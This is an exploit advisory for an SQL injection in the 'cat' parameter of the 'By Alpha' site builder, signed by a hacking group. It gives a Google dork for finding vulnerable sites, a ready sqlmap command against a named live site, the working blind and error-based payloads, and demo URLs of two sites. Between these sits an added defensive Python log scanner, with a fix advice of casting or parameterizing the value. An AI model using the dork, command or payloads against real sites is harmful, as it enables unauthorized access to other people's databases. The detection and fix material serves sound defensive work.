#################################################################################
# Exploit Title: By Alpha SQL Injection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"created by alpha" inurl:php?cat
# Tested on : Kali Linux 2018.1
# Date : 12.03.2018
# Vendor Home: http://www.alpha.net.gr/data/home.php
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial:
[+] Dorking in Google or another search engine
[+] sqlmap or manual, jSQL, themole, sqlsus
[+] SQL GET parameter "cat" is vulnerable
[+] The back-end DBMS is MySQL >= 5.1
[+] 302 redirect: answer N (no)
Command:
root@TrazeR:~# sqlmap --timeout=10 --threads=10 --time-sec=2 --random-agent --level=5 --risk=3 --ignore-proxy --hex --tamper=space2comment,between -u "http://www.thomasboats.gr/data/home.php?cat=950" --dbs
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=950' AND 2463=2463 AND 'EkSL' LIKE 'EkSL
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: cat=950' AND EXTRACTVALUE(7100,CONCAT(0x5c,0x717a6a7871,(SELECT (ELT(7100=7100,1))),0x717a626271)) AND 'YxZj' LIKE 'YxZj
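A defender-side check for the pattern above, as an added example that is not part of the original advisory: it scans web access logs for requests whose "cat" value is not a plain integer and labels the two techniques sqlmap reported. The log lines, IP addresses and function names are constructed for illustration, and an access log in common log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures taken from the two sqlmap findings quoted on this page.
SIGNATURES = [
    ("error-based (EXTRACTVALUE)", re.compile(r"\bEXTRACTVALUE\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
]
# Inline comments used in place of spaces, as the space2comment tamper does.
COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Client address and request target from a common-log-format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_cat(url):
    """Return None when every cat value is a plain integer, else a label."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name != "cat" or (value.isascii() and value.isdigit()):
            continue
        normalized = COMMENT.sub(" ", value)
        for label, pattern in SIGNATURES:
            if pattern.search(normalized):
                return label
        return "non-numeric cat value"
    return None

def scan(lines):
    """Return (client, label) for each log line with a suspicious cat value."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        label = classify_cat(m.group(2)) if m else None
        if label:
            findings.append((m.group(1), label))
    return findings

# Constructed sample log; the encoded payloads mirror the ones listed above.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2018:10:00:01 +0000] "GET /data/home.php?cat=950 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Mar/2018:10:00:05 +0000] "GET /data/home.php?cat=950%27/**/AND/**/2463=2463/**/AND/**/%27EkSL%27/**/LIKE/**/%27EkSL HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Mar/2018:10:00:06 +0000] "GET /data/home.php?cat=950%27%20AND%20EXTRACTVALUE(7100,CONCAT(0x5c,0x717a6a7871,(SELECT%20(ELT(7100=7100,1))),0x717a626271))%20AND%20%27YxZj%27%20LIKE%20%27YxZj HTTP/1.1" 200 312',
    '192.0.2.44 - - [12/Mar/2018:10:01:00 +0000] "GET /data/home.php?cat=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, label in scan(SAMPLE_LOG):
        print(client, label)
```

Handling "cat" strictly as an integer on the server (an integer cast or a parameterized query) removes the injection point; the scan only shows whether it was probed.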
Demo SQL:
http://www.thomasboats.gr/data/home.php?cat=950
http://salko.alpha.net.gr/data/home.php?cat=1083
Greet'Zzz :TrazeR & Zer0day & Göcebe & Kutluhan & R4PTOR